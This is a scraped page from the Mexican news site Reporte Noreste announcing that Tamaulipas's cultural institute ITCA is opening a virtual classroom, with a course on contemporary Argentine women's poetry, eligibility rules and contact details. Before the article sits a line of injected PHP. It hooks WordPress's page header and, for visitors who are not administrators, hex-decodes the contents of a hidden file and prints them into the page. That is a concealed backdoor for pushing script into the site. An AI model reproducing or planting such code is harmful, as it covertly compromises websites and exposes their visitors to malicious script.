if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Promueve ITCA aula virtual para cursos y talleres – Reporte Noreste
Conéctate con nosotros

Cd. Victoria, Tamaulipas.- Con la impartición del curso “Bailar cumbia con fe, escrituras poéticas de argentinas en el presente”, el Instituto Tamaulipeco para la Cultura y las Artes (ITCA) arrancará las actividades del Aula Virtual. Entre los objetivos de este proyecto se encuentran el de crear un espacio de formación artística nacional, conexión y encuentro entre creadores y estudiantes.

El primer curso en línea será impartido por Yolanda Segura, del 24 de septiembre al 18 de noviembre. Su objetivo es acercar a las y los participantes a las propuestas contemporáneas de la poesía escrita por mujeres de Argentina y ejercitar herramientas de aproximación crítica que les permita formar sus propias lecturas acerca de las mismas.

El ITCA lanzó la convocatoria por medio de su portal www.itca.gob.mx/convocatorias que va dirigida a mayores de 18 años, que sean oriundos o residentes de los estados de Tamaulipas, Nuevo León, Coahuila, Durango y Chihuahua, ya que esta actividad se realiza en colaboración con FORCAN, interesados en la lectura poética contemporánea, que sean especialistas o no.

Dicha convocatoria expira el día 4 de septiembre de 2015. Los seleccionados se darán a conocer vía correo electrónico el 17 del mismo mes, en donde se les informará a detalle como poder utilizar el Aula Virtual en la dirección www.aulavirtual.itca.gob.mx.

Para mayores informes los interesados deberán enviar un correo electrónico a itca.deda@gmail.com o llamar al teléfono (834) 1534312 extensión 126, en la Coordinación de Actividades Académicas de la Dirección de Educación y Desarrollo Artístico del ITCA.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en CYEN